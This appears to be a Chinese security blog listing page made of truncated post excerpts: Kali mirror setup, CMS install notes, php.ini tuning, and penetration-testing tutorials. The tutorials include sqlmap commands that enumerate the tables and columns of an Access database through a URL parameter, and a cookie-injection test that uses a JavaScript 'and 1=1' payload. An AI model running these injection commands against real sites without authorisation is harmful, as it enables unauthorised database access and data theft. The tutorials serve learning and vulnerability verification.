0x00 前言
大家都知道在平时的漏扫中,AWVS、APPSCAN、Netspark、webspectort等漏扫工具扫描出来的漏洞问题往往存在误报,这时我们就需要进行人工手动验证漏洞,这里我们有两种思路:
一是在漏洞工具中,进行多次的重复测试,AWVS、APPSCAN、Netspark、webspectort中都有重复测试漏洞问题的功能),将得出的多次结果进行分析和统计,确认漏洞是否存在。
二是对于特定的漏洞,例如Java反序列漏洞、struts2 各种漏洞、openssl、httpd远程拒绝服务、I...
由于kali的更新源是国外网站,替换成国内的镜像站,具体操作如下:
打开终端输入 leafpad /etc/apt/sources.list 把下面的源粘贴进去,原有内容注释掉
#中科大源
deb http://mirrors.ustc.edu.cn/kali sana main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali sana main non-free contrib...
由于kali的更新源是国外网站,替换成国内的镜像站,具体操作如下:
打开终端输入 leafpad /etc/apt/sources.list 把下面的源粘贴进去,原有内容注释掉
#中科大源
deb http://mirrors.ustc.edu.cn/kali sana main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali sana main non-free contrib...
很不错的一套CMS
下载地址:
http://down.chinaz.com/soft/36638.htm
安装方法
1\ 把www文件夹下的所有文件 放置到网站根目录
2\ 把 coreframe目录和caches目录 移动到 网站根目录
3\ http://www.xxxx.com/install/ 直接配置服务进行安装
access注入
http://www.a.com/0/View.asp?id=33
检测注入
C:\Python27\sqlmap>sqlmap.py -u "http://www.a.com/0/View.asp?id=33"
列表
C:\Python27\sqlmap>sqlmap.py -u "http://www.a.com/0/View.asp?id=33" --tables
列名
C:\Python27\sqlmap>sqlmap.py -u "http://www.a.com/0/View.asp?id=33" --colum...
sqlmap 再牛逼也就是个python的脚本,脚本再牛逼也得有–help -hh
所以第一件事当然是滚去看帮助文档。
sqlmap -hh
我操。。。。。。。这么多英文,多少只草泥马在心中奔腾,咋办,硬着头皮看呗,有些人头皮硬不了咋办,简单,来,哥教你简单的
注入分法不同,种类不同,来个简单的分类:
1.get型:sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx”
2.post型: sqlmap -u “http://xxx.xx.xxx/xx.xxx” –data=”xxxx=xxxx&xxxx=xxx”
3....
一:cookie注入的形成
程序对提交数据获取方式是直接request("c.s.t")的方式.未指明使用request对象的具体方法进行获取。
检测方法:
http://xxxx/view.asp?id=1
先访问http://xxxx/view.asp?id=1
接着在浏览器里输入:
javascript:alert(document.cookie="id="+escape("1 and 1=1")) &nb...
Windows 环境下的修改方法 ================================================================
第一步:修改在php5下POST文件大小的限制
1.编修php.ini
找到:max_execution_time = 30 ,这个是每个脚本运行的最长时间,单位秒,修改为:
max_execution_time = 150
找到:max_input_time = 60,这是每个脚本可以消耗的时间,单位也是秒,修改为:
max_input_time = 300
找到:m...
刚刚看到别人使用,不错的环境!!
upupw
http://www.upupw.net/